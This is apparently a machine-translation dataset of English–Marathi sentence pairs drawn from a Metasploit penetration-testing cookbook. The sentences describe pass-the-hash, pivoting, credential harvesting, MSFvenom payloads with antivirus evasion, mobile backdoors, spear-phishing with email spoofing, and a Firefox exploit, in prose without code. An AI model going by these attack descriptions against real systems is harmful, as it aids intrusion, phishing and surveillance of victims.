| {"en":"The pass the hash technique allows us to authenticate to a remote server or service by passing the hashed credentials directly without cracking them.","translation":"पास द हॅश तंत्रज्ञानामुळे, आम्हाला क्रेडेंशियल क्रॅक न करता, हॅश केलेले क्रेडेंशियल थेट पास करून रिमोट सर्व्हर किंवा सेवेवर प्रमाणीकरण (authenticate) करता येते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The attacker can compromise a web server that is connected to the internet.","translation":"आक्रमक इंटरनेटशी जोडलेल्या वेब सर्व्हरशी तडजोड करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Then, the attacker uses the compromised server to access the internal network.","translation":"मग, आक्रमक अंतर्गत नेटवर्कमध्ये प्रवेश करण्यासाठी तडजोड केलेल्या सर्व्हरचा वापर करतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This is a typical scenario that involves pivoting.","translation":"हे एक सामान्य उदाहरण आहे ज्यामध्ये पिव्हटिंगचा समावेश आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"In our lab, we use a dual home server to simulate an internet-facing server with access to the LAN network.","translation":"आपल्या प्रयोगशाळेत, आम्ही लॅन नेटवर्कमध्ये प्रवेशासह इंटरनेट-फेसिंग सर्व्हरचे अनुकरण करण्यासाठी एक दुहेरी होम सर्व्हर वापरतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To set up the Windows 10 client machine for this recipe, we first need to configure the network adapter.","translation":"या कृतीसाठी विंडोज 10 क्लायंट मशीन सेट करण्यासाठी, प्रथम नेटवर्क एडाप्टर कॉन्फिगर करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Then, we will disable the Windows 10 firewall and add a new registry key.","translation":"त्यानंतर, आम्ही विंडोज 10 फायरवॉल अक्षम करू आणि नवीन रजिस्ट्री की जोडू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"First, we will target the Linux server using the Samba \"username map script\" Command Execution exploit.","translation":"सुरुवातीला, आम्ही सांबा \"युजरनेम मॅप स्क्रिप्ट\" कमांड एक्झिक्युशन एक्सप्लॉईट वापरून लिनक्स सर्व्हरला लक्ष्य करू.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Now that we have a session, we will use the sessions command with the -u option to upgrade the shell to a Meterpreter session.","translation":"आता आपल्याकडे सत्र आहे, आम्ही शेलला मीटरप्रेटर सत्रात श्रेणीसुधारित करण्यासाठी -u पर्यायासह सत्र कमांड वापरू.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"With our newly created Meterpreter session, we can use the ifconfig command on the target to see the available interfaces.","translation":"आमच्या नव्याने तयार केलेल्या मीटरप्रेटर सत्रासह, आम्ही उपलब्ध इंटरफेस पाहण्यासाठी लक्ष्यावर ifconfig कमांड वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Our next aim will be to find which systems are available on this local network.","translation":"या स्थानिक नेटवर्कवर कोणती सिस्टम उपलब्ध आहेत हे शोधणे हे आपले पुढील ध्येय असेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To access the target in the 10.0.0.0/24 network, we will have to route all the packets through the compromised Linux machine.","translation":"10.0.0.0/24 नेटवर्कमधील लक्ष्यावर प्रवेश करण्यासाठी, आम्हाला सर्व पॅकेट तडजोड केलेल्या लिनक्स मशीनद्वारे रूट करावे लागतील.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Now, you can do a quick port scan on the IP address 10.0.0.161 using the TCP Port Scanner auxiliary module.","translation":"आता, आपण टीसीपी पोर्ट स्कॅनर सहाय्यक मॉड्यूल वापरून आयपी पत्ता 10.0.0.161 वर जलद पोर्ट स्कॅन करू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we know the target is running SMB, we can use the SMB Version Detection auxiliary module to display information about the system.","translation":"आता आपल्याला माहित आहे की लक्ष्य SMB चालवत आहे, आम्ही सिस्टमबद्दल माहिती प्रदर्शित करण्यासाठी SMB व्हर्जन डिटेक्शन सहाय्यक मॉड्यूल वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"With the information gathered, we can use the Microsoft Windows Authenticated User Code Execution exploit module.","translation":"एकत्र केलेल्या माहितीसह, आम्ही मायक्रोसॉफ्ट विंडोज ऑथेंटिकेटेड यूजर कोड एक्झिक्युशन एक्सप्लॉईट मॉड्यूल वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Discussing pivoting is never complete without talking about port forwarding.","translation":"पोर्ट फॉरवर्डिंगबद्दल चर्चा केल्याशिवाय पिव्हटिंगची चर्चा पूर्ण होत नाही.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"For this recipe, we will turn on Internet Information Services on the target Windows 10 machine and try to access it through port forwarding.","translation":"या कृतीसाठी, आम्ही लक्ष्य विंडोज 10 मशीनवर इंटरनेट इन्फॉर्मेशन सर्व्हिसेस चालू करू आणि पोर्ट फॉरवर्डिंगद्वारे त्यावर प्रवेश करण्याचा प्रयत्न करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Successful execution of the command shows that a local TCP relay has been set up between the attacker and the internal server.","translation":"कमांडच्या यशस्वी अंमलबजावणीमुळे असे दिसून येते की आक्रमक आणि अंतर्गत सर्व्हरमध्ये एक स्थानिक टीसीपी रिले स्थापित केला गेला आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"During a penetration test, we are not always getting sessions with system or even administrator privileges.","translation":"पेनेट्रेशन टेस्ट दरम्यान, आम्हाला नेहमीच सिस्टम किंवा प्रशासक विशेषाधिकारांसह सत्र मिळत नाहीत.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To harvest credentials, we will use the Windows Gather User Credentials post-exploitation module.","translation":"क्रेडेंशियल गोळा करण्यासाठी, आम्ही विंडोज गॅदर यूजर क्रेडेंशियल पोस्ट-एक्सप्लॉयटेशन मॉड्यूल वापरू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"After successfully compromising a target, our next task is to start enumeration.","translation":"लक्ष्यावर यशस्वीरित्या तडजोड केल्यानंतर, आपले पुढील कार्य म्हणजे गणना सुरू करणे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"You definitely need a sound knowledge of Ruby scripting if you want to build good modules.","translation":"जर तुम्हाला चांगले मॉड्यूल तयार करायचे असतील, तर तुम्हाला निश्चितच रूबी स्क्रिप्टिंगचे चांगले ज्ञान असणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"You can also contribute to the Metasploit community by releasing your module and let others benefit from it.","translation":"तुम्ही तुमचे मॉड्यूल प्रसिद्ध करून आणि इतरांना त्याचा फायदा घेऊ देऊन मेटास्प्लॉइट समुदायाला योगदान देऊ शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"MSFvenom is the tool to use for payload generation and encoding and it is an evolution of msfpayload and msfencode.","translation":"MSFvenom हे पेलोड तयार करणे आणि एन्कोडिंगसाठी वापरले जाणारे साधन आहे आणि ते msfpayload आणि msfencode चे उत्क्रांती आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we dig a bit deeper on the available payloads, learn why encoders can be useful when trying to evade detection, check the available executable, transform output formats, and much more.","translation":"या अध्यायात, आम्ही उपलब्ध पेलोडवर अधिक लक्ष केंद्रित करू, हे शिकू की डिटेक्शन टाळण्याचा प्रयत्न करताना एन्कोडर उपयुक्त का असू शकतात, उपलब्ध एक्झिक्युटेबल तपासा, आउटपुट फॉरमॅट रूपांतरित करा आणि बरेच काही.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"We can tell MSFvenom is one of the most versatile and useful payload-generation tools just by looking at the available payloads.","translation":"उपलब्ध पेलोड पाहूनच आपण सांगू शकतो की MSFvenom हे सर्वात बहुमुखी आणि उपयुक्त पेलोड-जनरेशन साधनांपैकी एक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To generate a payload, we always need to use at least two options, -p and -f.","translation":"पेलोड तयार करण्यासाठी, आपल्याला नेहमी कमीतकमी दोन पर्याय वापरावे लागतील, -p आणि -f.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The -p option is used to specify which payload to generate from all those available in the Metasploit Framework.","translation":"मेटॅस्प्लॉइट फ्रेमवर्कमध्ये उपलब्ध असलेल्या सर्व पेलोडमधून कोणते पेलोड तयार करायचे आहे हे निर्दिष्ट करण्यासाठी -p पर्याय वापरला जातो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The -f option is used to specify the output format.","translation":"आउटपुट फॉरमॅट निर्दिष्ट करण्यासाठी -f पर्याय वापरला जातो.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Executable formats will generate programs and scripts, while transform formats will just produce the payload.","translation":"एक्झिक्युटेबल फॉरमॅट प्रोग्राम आणि स्क्रिप्ट तयार करतील, तर ट्रान्सफॉर्म फॉरमॅट फक्त पेलोड तयार करतील.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"We can also specify a custom payload by using the -p option with -.","translation":"आम्ही -p पर्यायासह - वापरून कस्टम पेलोड देखील निर्दिष्ट करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"When generating payloads, we use the -a option for the architecture to use.","translation":"पेलोड तयार करताना, आपण वापरण्यासाठी -a पर्याय वापरतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"One useful feature when doing exploit development, is the --smallest option, which we can use to generate the smallest possible payload.","translation":"एक्सप्लॉइट डेव्हलपमेंट करताना एक उपयुक्त वैशिष्ट्य म्हणजे --smallest पर्याय, ज्याचा उपयोग आपण सर्वात लहान पेलोड तयार करण्यासाठी करू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"To test this payload, we can set the execution permission using the chmod command, and then run the payload.","translation":"हे पेलोड तपासण्यासाठी, आम्ही chmod कमांड वापरून एक्झिक्यूशन परमिशन सेट करू शकतो आणि नंतर पेलोड चालवू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In another terminal, we can use netcat to connect to the bind shell on port 4444.","translation":"दुसऱ्या टर्मिनलमध्ये, आपण पोर्ट 4444 वरील बाइंड शेलशी कनेक्ट होण्यासाठी नेटकॅट वापरू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Now that we have learned how to create a basic bind shell, we will try to create a reverse shell.","translation":"आता आपण मूलभूत बाइंड शेल कसे तयार करायचे हे शिकलो आहोत, तर आपण रिव्हर्स शेल तयार करण्याचा प्रयत्न करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"First, we need to see the available options for the selected payload, which we can do using the --payload-options option.","translation":"सुरुवातीला, निवडलेल्या पेलोडसाठी उपलब्ध असलेले पर्याय पाहणे आवश्यक आहे, जे आपण --payload-options पर्याय वापरून करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To test our payload, we first need to set up our listener on port 1234 in Metasploit.","translation":"आमचे पेलोड तपासण्यासाठी, प्रथम, आम्हाला मेटास्प्लॉइटमध्ये पोर्ट 1234 वर आमचे लिसनर सेट करावे लागेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Creating payloads for a Windows target is as easy.","translation":"विंडोज टार्गेटसाठी पेलोड तयार करणे सोपे आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Specifying an additional win32 shellcode, by using the -c or --add-code option, we can turn multiple payloads into one.","translation":"-c किंवा --add-code पर्याय वापरून, अतिरिक्त win32 शेलकोड निर्दिष्ट करून, आपण एकाधिक पेलोड एकाच पेलोडमध्ये बदलू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Generating payloads is just the first step; nowadays security products can easily pick up the shellcode generated by MSFvenom.","translation":"पेलोड तयार करणे हे फक्त पहिले पाऊल आहे; आजकाल सुरक्षा उत्पादने MSFvenom द्वारे तयार केलेले शेलकोड सहजपणे शोधू शकतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"After allowing unknown sources, you can install the backdoor and get a session on the target device.","translation":"अज्ञात स्त्रोतांना परवानगी दिल्यानंतर, तुम्ही बॅकडोअर स्थापित करू शकता आणि लक्ष्य उपकरणावर सत्र मिळवू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Besides all the regular meterpreter commands, using the Android payload we get a couple of specific commands.","translation":"सर्व नियमित मीटरप्रेटर कमांड्सव्यतिरिक्त, Android पेलोड वापरून आम्हाला काही विशिष्ट कमांड मिळतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Looking at the output of the help command, we can see that we can now get the call logs, read and send SMS messages, and get the location of the device.","translation":"मदत कमांडच्या आउटपुटवर नजर टाकल्यास, आपण पाहू शकतो की आता आपण कॉल लॉग मिळवू शकतो, एसएमएस संदेश वाचू आणि पाठवू शकतो आणि डिव्हाइसचे स्थान मिळवू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"There's more... Metasploit is not restricted to Android devices, if you have a jailbroken arm64 iOS device, you can also create a backdoor.","translation":"इतकेच नाही... Metasploit केवळ Android उपकरणांपुरते मर्यादित नाही, जर तुमच्याकडे जेलब्रेक केलेले arm64 iOS डिव्हाइस असेल, तर तुम्ही बॅकडोअर देखील तयार करू शकता.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"SET can be installed on Linux and macOS; it comes pre-installed on Kali Linux, which also maintains SET updates.","translation":"SET लिनक्स आणि macOS वर स्थापित केले जाऊ शकते; ते काली लिनक्सवर पूर्व-स्थापित येते, जे SET अद्यतने देखील राखते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"To launch SET on Kali Linux, start the Terminal window and run the setoolkit command.","translation":"काली लिनक्सवर SET सुरू करण्यासाठी, टर्मिनल विंडो सुरू करा आणि setoolkit कमांड चालवा.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"SET is a Python-based automation tool that creates a menu-driven application for us.","translation":"SET हे एक पायथन-आधारित ऑटोमेशन टूल आहे जे आपल्यासाठी मेनू-चालित ऍप्लिकेशन तयार करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"A spear-phishing attack vector is an email attack scenario that is used to send malicious emails to target/specific user(s).","translation":"एक स्पियर-फिशिंग हल्ला वेक्टर एक ईमेल हल्ला आहे जो लक्ष्य/विशिष्ट वापरकर्त्यांना दुर्भावनापूर्ण ईमेल पाठवण्यासाठी वापरला जातो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In order to spoof your own email address, you will require a sendmail server.","translation":"तुमचे स्वतःचे ईमेल ऍड्रेस स्पूफ करण्यासाठी, तुम्हाला सेंडमेल सर्व्हरची आवश्यकता असेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The spear-phishing module has three different attack vectors at our disposal.","translation":"स्पियर-फिशिंग मॉड्यूलमध्ये आपल्याकडे तीन भिन्न हल्ल्याचे मार्ग आहेत.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Passing the first option will start the mass email attack.","translation":"पहिला पर्याय निवडल्यास मोठ्या प्रमाणात ईमेल हल्ला सुरू होईल.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Then, we will be prompted to select a payload and specify the IP address or URL and the port for the listener.","translation":"नंतर, आम्हाला पेलोड निवडण्यास आणि श्रोत्यासाठी IP ऍड्रेस किंवा URL आणि पोर्ट निर्दिष्ट करण्यास सांगितले जाईल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Setting up your own server may not be very reliable, as most mail services use a reverse lookup.","translation":"तुमचा स्वतःचा सर्व्हर सेट करणे फारसे विश्वसनीय नसू शकते, कारण बहुतेक मेल सेवा रिव्हर्स लुकअप वापरतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"The SET web attack vector is a unique way of utilizing multiple web-based attacks.","translation":"SET वेब हल्ला वेक्टर अनेक वेब-आधारित हल्ल्यांचा उपयोग करण्याचा एक अनोखा मार्ग आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"After selecting the HTA Attack Method in SET, we can clone a site.","translation":"SET मध्ये HTA हल्ला पद्धत निवडल्यानंतर, आम्ही साइट क्लोन करू शकतो.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Like the mass email attack, SET will launch Metasploit using a resource script.","translation":"मोठ्या प्रमाणात ईमेल हल्ल्याप्रमाणे, SET संसाधनांचा वापर करून Metasploit लॉन्च करेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"When the victim opens the HTA application, we get a new session.","translation":"जेव्हा बळी HTA ऍप्लिकेशन उघडतो, तेव्हा आम्हाला नवीन सत्र मिळते.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"The multi-attack web method takes web attacks to the next level.","translation":"मल्टी-अटॅक वेब पद्धत वेब हल्ल्यांना पुढील स्तरावर घेऊन जाते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Once the file or URL is opened by the target user, then each attack is thrown one by one.","translation":"लक्ष्य वापरकर्त्याने फाइल किंवा URL उघडल्यानंतर, प्रत्येक हल्ला एकापाठोपाठ एक टाकला जातो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"The infectious media generator is a relatively simple attack vector.","translation":"संसर्गजन्य मीडिया जनरेटर हा तुलनेने सोपा हल्ला वेक्टर आहे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"This module will enumerate user accounts in the default domain using PowerShell.","translation":"हे मॉड्यूल पॉवरशेल वापरून डीफॉल्ट डोमेनमध्ये वापरकर्ता खात्यांची गणना करेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"To test it, I have added the Active Directory Domain Services Role to the Metasploitable 3 machine.","translation":"याची चाचणी घेण्यासाठी, मी मेटास्प्लोटेबल 3 मशीनवर ऍक्टिव्ह डिरेक्टरी डोमेन सर्व्हिसेस भूमिका जोडली आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Since we do not need to be a privileged user to use this module, it can be very useful during post exploitation.","translation":"हे मॉड्यूल वापरण्यासाठी आपल्याला विशेषाधिकारप्राप्त वापरकर्त्याची आवश्यकता नसल्यामुळे, ते पोस्ट एक्सप्लॉयटेशन दरम्यान खूप उपयुक्त ठरू शकते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"For that reason, in this recipe, we will learn how to build our own auxiliary module.","translation":"त्यामुळे, या रेसिपीमध्ये, आम्ही आमचे स्वतःचे सहाय्यक मॉड्यूल कसे तयार करायचे हे शिकू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"CWMP is a protocol used by providers for remote management of customer-premises equipment.","translation":"CWMP हे प्रदात्यांद्वारे ग्राहक-परिसर उपकरणांच्या रिमोट व्यवस्थापनासाठी वापरले जाणारे प्रोटोकॉल आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"When we connect to the router using the CWMP default port 7547, we get the following answer:","translation":"जेव्हा आपण CWMP डीफॉल्ट पोर्ट 7547 वापरून राउटरशी कनेक्ट होतो, तेव्हा आम्हाला खालील उत्तर मिळते:","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"With this information, we can build an auxiliary module to scan a target range and identify targets running Huawei home routers with CWMP enabled.","translation":"या माहितीसह, आम्ही लक्ष्य श्रेणी स्कॅन करण्यासाठी आणि CWMP सक्षम असलेल्या Huawei होम राउटर चालवणाऱ्या लक्ष्यांची ओळख पटवण्यासाठी एक सहाय्यक मॉड्यूल तयार करू शकतो.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Again, we will just focus on the run method.","translation":"पुन्हा, आम्ही फक्त रन पद्धतीवर लक्ष केंद्रित करू.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"For our module, we will start by changing the initialize method.","translation":"आमच्या मॉड्यूलसाठी, आम्ही इनिशियलाइझ पद्धत बदलून सुरुवात करू.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Using the register_options data structure, we can specify the default port number for the module, and since we want to scan for the CWMP service we will specify port 7547:","translation":"register_options डेटा स्ट्रक्चर वापरून, आम्ही मॉड्यूलसाठी डीफॉल्ट पोर्ट नंबर निर्दिष्ट करू शकतो आणि आम्हाला CWMP सेवेसाठी स्कॅन करायचे असल्याने, आम्ही पोर्ट 7547 निर्दिष्ट करू:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Then, we need to compare the response and verify that the equipment is a Huawei Home Gateway.","translation":"त्यानंतर, आम्हाला प्रतिसाद तुलना करणे आणि उपकरण Huawei होम गेटवे आहे की नाही हे सत्यापित करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"For that, we will create a new variable called huawei holding the response from our router:","translation":"त्यासाठी, आम्ही huawei नावाचे नवीन व्हेरिएबल तयार करू जे आमच्या राउटरकडून मिळालेला प्रतिसाद धरून ठेवेल:","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Next, we will use an if statement to compare the response from the target with the response from our router and, if they match, print and save the result:","translation":"पुढे, आम्ही लक्ष्याचा प्रतिसाद आमच्या राउटरच्या प्रतिसादाशी तुलना करण्यासाठी 'इफ' स्टेटमेंट वापरू आणि ते जुळल्यास, परिणाम मुद्रित आणि जतन करू:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Save the code into a file named huawei_cwmp.rb in /usr/share/metasploit- framework/modules/auxiliary/scanner/http, load the module using msfconsole, set the IP address or range you want to scan, and run the module:","translation":"huawei_cwmp.rb नावाने /usr/share/metasploit-framework/modules/auxiliary/scanner/http मध्ये कोड सेव्ह करा, msfconsole वापरून मॉड्यूल लोड करा, स्कॅन करू इच्छित असलेला IP पत्ता किंवा रेंज सेट करा आणि मॉड्यूल चालवा:","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Since we are saving the output to the current workspace, we can use the host and services command to display the result of the scan:","translation":"आम्ही आऊटपुट वर्तमान वर्कस्पेसमध्ये सेव्ह करत असल्याने, आम्ही स्कॅनचा परिणाम प्रदर्शित करण्यासाठी होस्ट आणि सर्व्हिसेस कमांड वापरू शकतो:","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"In this chapter, we will cover the following recipes:","translation":"या अध्यायात, आम्ही खालील पाककृतींचा समावेश करू:","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Mixins are comprehensive mechanisms in the Ruby language that provide functionality for a module.","translation":"मिक्सिन हे रूबी भाषेतील सर्वसमावेशक यंत्रणा आहेत जे मॉड्यूलसाठी कार्यक्षमता प्रदान करतात.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Using mixins in exploit modules can help in calling different functions that the exploits require.","translation":"एक्सप्लॉईट मॉड्यूल्समध्ये मिक्सिन वापरल्याने, एक्सप्लॉईट्सना आवश्यक असलेली विविध कार्ये कॉल करण्यास मदत होते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"This mixin provides methods for interacting with an SMB/CIFS service on a remote machine.","translation":"हे मिक्सिन रिमोट मशीनवर SMB/CIFS सेवेशी संवाद साधण्यासाठी पद्धती प्रदान करते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"It is essential to understand the exploit module structure, as it will help us analyze different exploit modules.","translation":"एक्सप्लॉईट मॉड्यूलची रचना समजून घेणे आवश्यक आहे, कारण ते विविध एक्सप्लॉईट मॉड्यूल्सचे विश्लेषण करण्यास मदत करेल.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"UDP Service Sweeper.","translation":"UDP सेवा स्वीपर.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"User Account Control (UAC) bypassing.","translation":"यूजर अकाउंट कंट्रोल (UAC) बायपास करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Version detection.","translation":"आवृत्ती शोधणे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Virtual Network Computing (VNC) injecting remotely.","translation":"व्हर्च्युअल नेटवर्क कंप्यूटिंग (VNC) दूरस्थपणे इंजेक्ट करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Vulnerability.","translation":"असुरक्षितता.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Website attack vectors.","translation":"वेबसाइट हल्ल्याचे मार्ग.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows 10 machine exploiting.","translation":"विंडोज 10 मशीनचा फायदा घेणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows binaries backdooring.","translation":"विंडोज बायनरीमध्ये बॅकडोअर करणे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Windows Local Enumeration (WinEnum) used, for system scraping.","translation":"सिस्टम स्क्रॅपिंगसाठी विंडोज लोकल एन्यूमरेशन (WinEnum) वापरले जाते.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Windows Management Instrumentation (WMI).","translation":"विंडोज मॅनेजमेंट इन्स्ट्रुमेंटेशन (WMI).","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows Remote Management (WinRM) scanning.","translation":"विंडोज रिमोट मॅनेजमेंट (WinRM) स्कॅनिंग.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Windows Server machine exploiting.","translation":"विंडोज सर्व्हर मशीनचा फायदा घेणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Installing Windows Metasploit.","translation":"विंडोज मेटास्प्लोइट स्थापित करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Wireless MITM attacks.","translation":"वायरलेस एमआयटीएम हल्ले.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Setting up wireless MITM attacks.","translation":"वायरलेस एमआयटीएम हल्ले सेट करणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Performing wireless penetration test with Metasploit.","translation":"मेटास्प्लोइट वापरून वायरलेस पेनिट्रेशन टेस्ट करणे.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Creating workspaces.","translation":"कार्यक्षेत्र तयार करणे.","target_lang":"mr","domain":"technical","complexity":"simple"} | |
| {"en":"Using website attack vectors.","translation":"वेबसाइट हल्ल्याचे मार्ग वापरणे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Virtual networks reference.","translation":"व्हर्च्युअल नेटवर्क संदर्भ.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Vulnerable machines URL.","translation":"असुरक्षित मशीनचे URL.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"However, when we get access to a client machine the reality is different.","translation":"परंतु, जेव्हा आपल्याला क्लायंट मशीनमध्ये प्रवेश मिळतो, तेव्हाची वस्तुस्थिती वेगळी असते.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 262 ] Exploiting a Windows 10 machine In this recipe, we will exploit a use-after-free vulnerability present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.","translation":"क्लायंट-साइड शोषण आणि अँटीव्हायरस बायपास, प्रकरण 7 [ 262 ] विंडोज 10 मशीनचे शोषण या रेसिपीमध्ये, आम्ही मायक्रोसॉफ्ट विंडोजवरील मोझिला फायरफॉक्सच्या अनेक आवृत्त्यांमध्ये nsSMILTimeContainer::NotifyTimeChange() मध्ये उपस्थित असलेल्या वापरानंतर-मुक्त असुरक्षिततेचा फायदा घेऊ.","target_lang":"mr","domain":"technical","complexity":"complex"} | |
| {"en":"Getting ready So, before we begin we need to download Mozilla Firefox 41.0 from https://ftp.mozilla. org/pub/firefox/releases/41.0/win32/en-US/Firefox%20Setup%2041.0.exe and install it on our Windows 10 target machine.","translation":"तयारी करत आहे. तर, सुरुवात करण्यापूर्वी, आम्हाला Mozilla Firefox 41.0 https://ftp.mozilla.org/pub/firefox/releases/41.0/win32/en-US/Firefox%20Setup%2041.0.exe येथून डाउनलोड करणे आणि ते आमच्या विंडोज 10 लक्ष्यित मशीनवर स्थापित करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
| {"en":"How to do it... As always, good reconnaissance makes all the difference, so we first need to gather information about the browser the victim is using.","translation":"कसे करायचे... नेहमीप्रमाणे, चांगली टेहळणी (reconnaissance) खूप महत्त्वाचे ठरते, त्यामुळे, सर्वात आधी, पीडित व्यक्ती वापरत असलेल्या ब्राउझरबद्दल माहिती गोळा करणे आवश्यक आहे.","target_lang":"mr","domain":"technical","complexity":"moderate"} | |
